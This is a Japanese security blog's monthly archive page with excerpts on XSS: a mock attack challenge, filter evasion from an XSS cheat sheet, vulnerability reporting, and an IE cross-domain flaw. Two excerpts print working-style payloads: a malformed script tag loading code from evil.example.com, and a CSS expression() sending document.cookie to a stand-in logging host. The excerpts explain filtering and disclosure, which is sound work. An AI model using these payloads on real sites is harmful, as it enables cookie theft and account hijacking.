2006-07-01から1ヶ月間の記事一覧

XSS模擬アタック出題編

遊びでCGIを作りました。XSS脆弱性があります。模擬アタックをかけてみてください。上の図のように、勝手な英文を2行ほど、背景は黒で字は白く、表示して下さい。元々表示されるべきコンテンツが出ていてはいけません。URL欄は当該CGIのURLにしてください。…

XSS Cheat Sheet を読んでいたら

<SCRIPT/!#$%&()*~+-_.,:;?@[/|\]^`=''SRC!#$%&()*~+-_.,:;?@[/|\]^`='http://evil.example.com/xss.js'></SCRIPT>こんな畸形例がFirefoxで通るらしい。"<SCRIPT\s" != "<SCRIPT/XSS\s" とかどころじゃないので正しくフィルタリングしようねというお話し、ということでいいのかな? Rsnake氏、FirefoxのHTML parser を読んで発見したらしい。<SCRIPT/=''SRC='http://evil.example.com/xss.js'></script\s">

■XSS脆弱性悲喜こもごも XSS脆弱性関連で本日嬉しかったこと1 はてなのサービスのXSS脆弱性をはてなさんに報告したら5分以内に返事が返ってきたこと。これは嬉しいですね。私がはてなを継続的に使うのはこういうマジメさが好きだからです。 とはいえ、恐ら…

■XSS脆弱性修正に失敗してしまった駄目な例 はじめに 本件は本日IPAに報告したものです。未修正の脆弱性を抱えているサイトについてつまびらかにすることは宜しくありませんし、そのことは重々承知しております。しかしながら色々な意味で非常に教訓的ですの…

cookieをお預かりします: 悪意ある共同預かり所

<html> <body> <style type="text/css"> h1 { background#:/*;*/ expression('url(http://commonevillogger.example.com/log.php'+document.cookie+')'); } </style> <h1>heading</h1> </body> </html>上記はCookieを悪意あるサイトに飛ばす例です。IEのみ対応。 (ちなみに、expressionを使っていてもcommonevillogger.example.…

■IE object要素のクロスドメイン情報漏えいの脆弱性(CVE-2006-3280)への対処策について 本記事の概要 以下の記事中における、IEのふたつの脆弱性のうち、object要素におけるクロスドメインのセキュリティ・ホール(CVE-2006-3280)に対しての、一定程度有効な…